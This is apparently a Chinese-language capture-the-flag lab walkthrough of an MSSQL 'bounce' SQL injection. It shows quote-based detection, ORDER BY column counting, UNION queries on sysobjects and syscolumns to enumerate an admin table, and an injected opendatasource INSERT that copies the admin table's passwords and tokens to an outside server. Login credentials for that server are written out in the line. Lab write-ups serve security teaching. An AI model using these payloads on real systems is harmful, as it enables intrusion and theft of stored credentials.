【web安全】sql注入之反弹注入靶场实战

打开靶场,输入’号,然后有明显的报错提示,确认存在注入
【web安全】sql注入之反弹注入靶场实战

然后直接输入
’ order by 3 – yuyu
页面显示正常
【web安全】sql注入之反弹注入靶场实战

然后试试5,页面显示不正常,然后就试试4,页面也显示不正常,然后知道了字段数是3
然后就直接联合查询,输入
’ union all select id,null,null from dbo.sysobjects where xtype=‘U’ – yuyu
得到437576597,1977058079,2057058364
然后就查一下数据库的名字,输入
’ union all select id,name,null from dbo.sysobjects where xtype=‘U’ – yuyu
查到数据news,admin,dtproperties三个表
【web安全】sql注入之反弹注入靶场实战

然后查一下admin表里面的字段,输入
’ union all select id,name,null from dbo.syscolumns where id=1977058079 – yuyu
发现有四个字段,分别是id,passwd,token,username
【web安全】sql注入之反弹注入靶场实战

然后利用自己的服务器,接收一下靶场数据库的信息
创建一个有四个字段的数据库
create table bachang (a char(255),b char(255),c char(255),d char(255))
【web安全】sql注入之反弹注入靶场实战

然后运用函数,把数据库信息反弹到自己的数据库里面,输入
';insert into opendatasource(‘sqloledb’,‘server=SQL5006.webweb.com,1433;uid=DB_14B8A65_jmq_admin;pwd=jmqjmqjmq;database=DB_14B8A65_jmq’).DB_14B8A65_jmq.dbo.bachang select *from admin – yuyu

然后去自己的数据库查询
然后就查到flag
【web安全】sql注入之反弹注入靶场实战

zkaq{e9c9e67c5}